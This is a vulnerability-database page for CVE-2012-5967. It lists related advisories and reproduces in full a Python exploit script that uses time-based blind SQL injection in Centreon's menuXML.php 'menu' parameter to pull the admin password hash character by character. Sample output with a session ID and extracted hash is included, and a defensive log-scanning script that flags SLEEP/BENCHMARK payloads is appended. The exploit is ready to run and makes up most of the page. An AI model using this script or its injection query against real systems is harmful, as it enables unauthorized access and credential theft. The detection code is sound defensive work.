| Title | Published | Views | Family |
|---|---|---|---|
| Centreon 2.3.3 < 2.4.0 menuXML.php 'menu' Parameter SQL Injection | 23 Dec 2014 00:00 | – | nessus |
| CVE-2012-5967 | 19 Dec 2012 11:00 | – | cve |
| CVE-2012-5967 | 19 Dec 2012 11:00 | – | cvelist |
| Centreon Enterprise Server 2.3.3 < 2.3.9-4 - Blind SQL Injection | 13 Dec 2012 00:00 | – | exploitdb |
| EUVD-2012-5841 | 7 Oct 2025 00:30 | – | euvd |
| Centreon Enterprise Server 2.3.3 2.3.9-4 - Blind SQL Injection | 13 Dec 2012 00:00 | – | exploitpack |
| CVE-2012-5967 | 19 Dec 2012 11:55 | – | nvd |
| Centreon 2.3.x SQL Injection | 13 Dec 2012 00:00 | – | packetstorm |
| Sql injection | 19 Dec 2012 11:55 | – | prion |
| Centreon 2.3.3 through 2.3.9-4 blind sqli injection vulnerability. | 12 Dec 2012 00:00 | – | cert |

#!/usr/bin/env python
# Exploit Title: Centreon 2.3.3 - 2.3.9-4 menuXML.php Blind SQL Injection Exploit
# Disclosure Date: December 12, 2012
# Author: modpr0be (@modpr0be)
# Platform: Linux
# Tested on: Centreon Enterprise Server with Centreon 2.3.9-4 on CentOS 5.5 x86_64 (Final)
# Software Link: http://www.centreon.com/Content-Download/download-centreon-enterprise-server
# References: http://www.spentera.com/2012/12/centreon-enterprise-server-blind-sql-injection/
# CVE-ID: CVE-2012-5967
### DISCLAIMER
# Script provided 'as is', without any warranty.
# For educational purposes only.
# Do not use this code to do anything illegal.
### Software Description
# The Centreon Software Suite is a set of modular software programs designed for managing
# and controlling your information systems. It lets you supervise and measure performance and
# quality of service so that you can optimise the use of your resources.
### Vulnerability Details
# Vulnerability found in menuXML.php inside the 'menu' parameter. By injecting payload after the
# menu parameter, e.g: ' AND SLEEP(5) AND 'meHL'='meHL, the web application hung for 5 seconds,
# which gives us a conclusion that the web application is vulnerable to time-based sql injection.
## Further notes:
# User with low privilege access (e.g: guest user) can still exploit this vulnerability
# The script below is for PoC of the vulnerability only.
# -=] Centreon 2.3.3 - 2.3.9-4 Time-based BlindSQLi Exploit [=-
# [ by modpr0be - research[at]spentera.com ]
#
# (!) We need the target IP: 172.16.199.150
# (!) Put the value of a valid PHPSESSID session: 3uh52mtl1hlmsha4nmkftde5l3
# (-) Using Time-Based method with 1s delay. This will take some time, go grab a coffee..
# (!) Getting admin password hash: 2995cb0650c5f107230ed569a8c4d6e5
# (-) Done! Admin password hash extracted in 676 seconds
### Solution
# Update to Centreon 2.4.0 or newer.
### Disclosure timeline
# 10/26/2012 - Bug found and reported to CERT/CC
# 12/07/2012 - Update from CERT/CC to publish on 12/12/2012
# 12/12/2012 - Security advisory released via CERT/CC
import sys,time,urllib,urllib2
print """
-=] Centreon 2.3.3 - 2.3.9-4 Time-based BlindSQLi Exploit [=-
[ by modpr0be - research[at]spentera.com ]
"""
host = raw_input("(!) We need the target IP: ")
target = 'http://%s/centreon/menu/xml/menuXML.php' %(host)
# sid is the same as PHPSESSID session value, so put the value of PHPSESSID here
sid = raw_input("(!) Put the value of a valid PHPSESSID session: ")
cookie = 'PHPSESSID=%s' %(sid)
# SQLi delay, tested on LAN environment.
# Consider if it's a remote target, you may increase the delay value (default: 1 seconds)
delay=1
print "(-) Using Time-Based method with %ds delay. This will take some time, go grab a coffee..\n"%int(delay)
def Hex2Des(item):
    return ord(hex(item).replace('0x',''))
def adminhash(m,n):
    #borrow from SQLmap :)
    adminquery=("' AND 9999=IF((ORD(MID((SELECT IFNULL(CAST(contact_passwd AS CHAR),0x20) FROM contact"
                " WHERE contact_id=1 LIMIT 0,1),%s,1)) > %s),SLEEP(%s),9999) AND 'mEhL'='mEhL" %(m,n,delay))
    value = { 'menu': '2'+adminquery,
              'sid': '%s'%(sid) }
    url = "%s?%s" %(target,urllib.urlencode(value))
    req = urllib2.Request(url)
    req.add_header('Cookie', cookie)
    try:
        starttime=time.time()
        response = urllib2.urlopen(req)
        endtime = time.time()
        return int(endtime-starttime)
    except:
        print '\n(-) Uh oh! Exploit fail..'
        sys.exit(0)
sys.stdout.write('(!) Getting admin password hash: ')
sys.stdout.flush()
starttime = time.time()
for m in range(1,33):
    for n in range(0,16):
        wkttunggu = adminhash(m,Hex2Des(n))
        if (wkttunggu < delay):
            sys.stdout.write(chr(Hex2Des(n)))
            sys.stdout.flush()
            break
endtime = time.time()
print "\n(-) Done! Admin password hash extracted in %d seconds" %int(endtime-starttime)
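
A defender-side check for the request pattern this PoC produces, added here as an example and not part of the original advisory or script: it scans web access logs for `menuXML.php` requests whose `menu` value is not a plain integer and separately labels values that call a SQL timing function. The combined log format, the sample lines and the assumption that legitimate `menu` values are numeric are constructed for illustration (Python 3).

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined format, documentation IP ranges).
SAMPLE_LOG = """\
192.0.2.10 - - [12/Dec/2012:10:00:01 +0000] "GET /centreon/menu/xml/menuXML.php?menu=2&sid=aaaa HTTP/1.1" 200 512
198.51.100.7 - - [12/Dec/2012:10:00:05 +0000] "GET /centreon/menu/xml/menuXML.php?menu=2%27+AND+SLEEP%285%29+AND+%27meHL%27%3D%27meHL&sid=bbbb HTTP/1.1" 200 0
198.51.100.7 - - [12/Dec/2012:10:00:11 +0000] "GET /centreon/menu/xml/menuXML.php?menu=2%27+AND+SLEEP%285%29+AND+%27meHL%27%3D%27meHL&sid=bbbb HTTP/1.1" 200 0
203.0.113.5 - - [12/Dec/2012:10:01:00 +0000] "GET /centreon/menu/xml/menuXML.php?menu=2%27&sid=cccc HTTP/1.1" 200 0
192.0.2.10 - - [12/Dec/2012:10:02:00 +0000] "GET /centreon/main.php?p=1 HTTP/1.1" 200 2048
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')
NUMERIC_RE = re.compile(r'[0-9]+')                          # assumed shape of a legitimate value
TIMING_RE = re.compile(r'\b(sleep|benchmark)\s*\(', re.I)   # MySQL delay primitives

def classify(line):
    """Return (client, verdict) for a menuXML.php request, or None for any other line."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target, _status = m.groups()
    url = urlsplit(target)
    if not url.path.endswith('/menu/xml/menuXML.php'):
        return None
    # parse_qs URL-decodes the value, so %27 and + are seen as ' and space.
    values = parse_qs(url.query, keep_blank_values=True).get('menu', [])
    if all(NUMERIC_RE.fullmatch(v) for v in values):
        return client, 'ok'
    if any(TIMING_RE.search(v) for v in values):
        return client, 'timing-sqli'
    return client, 'non-numeric'

def scan(log_text):
    """Count suspicious menuXML.php requests per (client, verdict)."""
    hits = Counter()
    for line in log_text.splitlines():
        result = classify(line)
        if result and result[1] != 'ok':
            hits[result] += 1
    return hits

if __name__ == '__main__':
    for (client, verdict), count in scan(SAMPLE_LOG).items():
        print(client, verdict, count)
```

Because the extraction issues one request per guess, a high per-client count from `scan` within a short window is a stronger signal than any single hit.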